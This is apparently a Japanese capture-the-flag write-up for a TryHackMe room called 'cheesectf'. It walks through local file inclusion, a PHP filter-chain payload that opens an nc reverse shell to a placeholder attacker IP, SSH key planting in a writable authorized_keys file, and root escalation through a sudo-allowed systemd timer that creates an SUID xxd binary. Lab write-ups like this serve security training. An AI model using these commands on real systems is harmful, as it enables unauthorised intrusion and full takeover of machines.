LFIの可能性を探るため、クエリパラメータの引数に/etc/passwd
ファイルを指定してアクセスすると、ファイルの中身が確認できました。
引き続き調査を行うと、Messagesページでは、ファイルパラメータを使用してリソースが呼び出されていることが分かります。また、リソースを統合するときにPHPフィルターが使用されていることが確認できます。
システムハッキング
PHPのfilter chainを利用して、足場を作ります。
アクセスの獲得
php://filter
は、PHPのストリームラッパーの一つであり、データの入出力時に特定のフィルタを適用できる機能です。
PHPのストリームラッパーは、ファイルやデータストリームなど外部リソースにアクセスするための抽象化されたインターフェースを提供します。また、ファイルの読み書き時にフィルタを用いて、特定のエンコードやデコード、変換処理などが可能です。
リバースシェルを取得するためには、以下のツールを利用してPHPのfilter chainを生成します。
ツールを実行する際は、--chain
の引数にリバースシェルを取得するコマンドを指定して実行します。
$ python php_filter_chain_generator.py --chain '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <Your IP address> <Port> >/tmp/f"); ?>' | grep '^php' > payload.txt
リスナーを用意した状態で、生成したファイルにアクセスすることで、リバースシェルを取得します。
$ curl -s "http://<IP address>/secret-script.php?file=$(cat payload.txt)"
listening on [any] 4444 ...
connect to [<Your IP address>] from (UNKNOWN) [10.10.123.5] 39838
sh: 0: can't access tty; job control turned off
$
リバースシェル取得後はシェルが不安定な状態になっているため、シェルを安定させます。
$ /usr/bin/python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@cheesectf:/var/www/html$ ^Z
[1]+ 停止 nc -lnvp 4444
┌──(kali㉿kali)-[~/Downloads]
└─$ stty raw -echo; fg
nc -lnvp 4444
export TERM=xterm
www-data@cheesectf:/var/www/html$ export SHELL=bash
ユーザーフラグ
水平展開を行うにあたりLinPEASを用いて調査を行います。
linpeas.shを実行後Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
のセクションを確認します。
/dev/mqueue
/dev/shm
/etc/systemd/system/exploit.timer
/home/comte/.ssh/authorized_keys
/run/lock
/run/lock/apache2
/run/screen
/snap/core20/2015/run/lock
/snap/core20/2015/tmp
/snap/core20/2015/var/tmp
/snap/core20/2182/run/lock
/snap/core20/2182/tmp
/snap/core20/2182/var/tmp
/tmp
/tmp/linpeas.sh
/tmp/tmux-33
/var/cache/apache2/mod_cache_disk
/var/crash
/var/lib/php/sessions
/var/tmp
上記結果より/home/comte/.ssh/authorized_keys
ファイルについて、書き込み可能な権限が設定されていることが分かります。
-rw-rw-rw- 1 comte comte 0 Mar 25 2024 /home/comte/.ssh/authorized_keys
ssh-keygen
コマンドを実行して、 生成したSSHの公開鍵を/home/comte/.ssh/authorized_keys
ファイルに追記します。
ssh-ed25519 ********************************************************************
生成したSSHの秘密鍵を用いてcomteユーザーでログインします。
$ ssh -i ssh_id.rsa comte@<IP address>
ユーザーフラグが確認できます。
total 52
drwxr-xr-x 7 comte comte 4096 Apr 4 2024 ./
drwxr-xr-x 3 root root 4096 Sep 27 2023 ../
lrwxrwxrwx 1 comte comte 9 Apr 4 2024 .bash_history -> /dev/null
-rw-r--r-- 1 comte comte 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 comte comte 3771 Feb 25 2020 .bashrc
drwx------ 2 comte comte 4096 Sep 27 2023 .cache/
drwx------ 3 comte comte 4096 Mar 25 2024 .gnupg/
drwxrwxr-x 3 comte comte 4096 Mar 25 2024 .local/
-rw-r--r-- 1 comte comte 807 Feb 25 2020 .profile
drwx------ 3 comte comte 4096 Mar 25 2024 snap/
drwxr-xr-x 2 comte comte 4096 Mar 25 2024 .ssh/
-rw-r--r-- 1 comte comte 0 Sep 27 2023 .sudo_as_admin_successful
-rw------- 1 comte comte 4276 Sep 15 2023 user.txt
-rw------- 1 comte comte 55 Apr 4 2024 .Xauthority
ルートフラグ
ルートフラグを取得するためには、権限昇格が必要です。
sudo -l
を実行すると、以下の様な出力が確認できました。
User comte may run the following commands on cheesectf:
(ALL) NOPASSWD: /bin/systemctl daemon-reload
(ALL) NOPASSWD: /bin/systemctl restart exploit.timer
(ALL) NOPASSWD: /bin/systemctl start exploit.timer
(ALL) NOPASSWD: /bin/systemctl enable exploit.timer
上記結果を踏まえて、systemctlに登録しているexploit.timerを実行できることが確認できます。
/etc/systemd/system/exploit.timer
ファイルと/etc/systemd/system/exploit.service
ファイルの中身を確認します。
- /etc/systemd/system/exploit.timer
[Unit] Description=Exploit Timer [Timer] OnBootSec= [Install] WantedBy=timers.target
- /etc/systemd/system/exploit.service
[Unit] Description=Exploit Service [Service] Type=oneshot ExecStart=/bin/bash -c "/bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd"
OnBootSec
はシステム起動後すぐにサービスを実行する設定です。/etc/systemd/system/exploit.timer
ファイルを利用するために、OnBootSec
の値を0
に設定します。これにより、Unitに紐付いたサービスファイルが起動されます。
OnBootSec=0
systemctl
コマンドを実行して、exploit.timeに関する現在の状態を確認します。
$ systemctl status exploit.timer
●exploit.timer - Exploit Timer
Loaded: loaded (/etc/systemd/system/exploit.timer; disabled; vendor preset: enabled)
Active: inactive (dead)
Trigger: n/a
Triggers: ●exploit.service
$ systemctl status exploit.service
●exploit.service - Exploit Service
Loaded: loaded (/etc/systemd/system/exploit.service; static; vendor preset: enabled)
Active: inactive (dead)
systemctlを再読み込みし、exploit.timerを起動します。
$ sudo /bin/systemctl daemon-reload
$ sudo /bin/systemctl start exploit.timer
再度状態を確認します。
$ systemctl status exploit.timer
●exploit.timer - Exploit Timer
Loaded: loaded (/etc/systemd/system/exploit.timer; disabled; vendor preset: enabled)
Active: active (elapsed) since Fri 2024-10-25 12:21:30 UTC; 1min 15s ago
Trigger: n/a
Triggers:●exploit.service
$ systemctl status exploit.service
●exploit.service - Exploit Service
Loaded: loaded (/etc/systemd/system/exploit.service; static; vendor preset: enabled)
Active: inactive (dead) since Fri 2024-10-25 12:21:30 UTC; 3s ago
TriggeredBy: ●exploit.timer
Process: 27536 ExecStart=/bin/bash -c /bin/cp /usr/bin/xxd /opt/xxd && /bin/chmod +sx /opt/xxd (code=exited, status=0/SUCCESS)
Main PID: 27536 (code=exited, status=0/SUCCESS)
exploit.timerを起動後、/opt
ディレトクリ配下に移動してls
コマンドなどを実行すると、ステッキービットが付与されたxxd
ファイルが生成されていることが確認できます。
total 28
drwxr-xr-x 2 root root 4096 Oct 25 12:21 ./
drwxr-xr-x 19 root root 4096 Sep 27 2023 ../
-rwsr-sr-x 1 root root 18712 Oct 25 12:21 xxd*
以下のコマンドを実行すると、ルートフラグが読み取れます。
$ LFILE=/root/root.txt
$ ./xxd "$LFILE" | xxd -r
_ _ _ _ __
___| |__ ___ ___ ___ ___ (_)___ | (_)/ _| ___
/ __| '_ \ / _ \/ _ \/ __|/ _ \ | / __| | | | |_ / _ \
| (__| | | | __/ __/\__ \ __/ | \__ \ | | | _| __/
\___|_| |_|\___|\___||___/\___| |_|___/ |_|_|_| \___|
THM{****************************************}
ルートユーザーに昇格するためには、同じ要領で昇格できます。
$ echo 'ssh-ed25519 ********************************************************************' | /opt/xxd | /opt/xxd -r - /root/.ssh/authorized_keys
$ ssh -i ssh_id.rsa root@<IP address>
uid=0(root) gid=0(root) groups=0(root)
おわりに
列挙スキルが試される面白いRoomでした。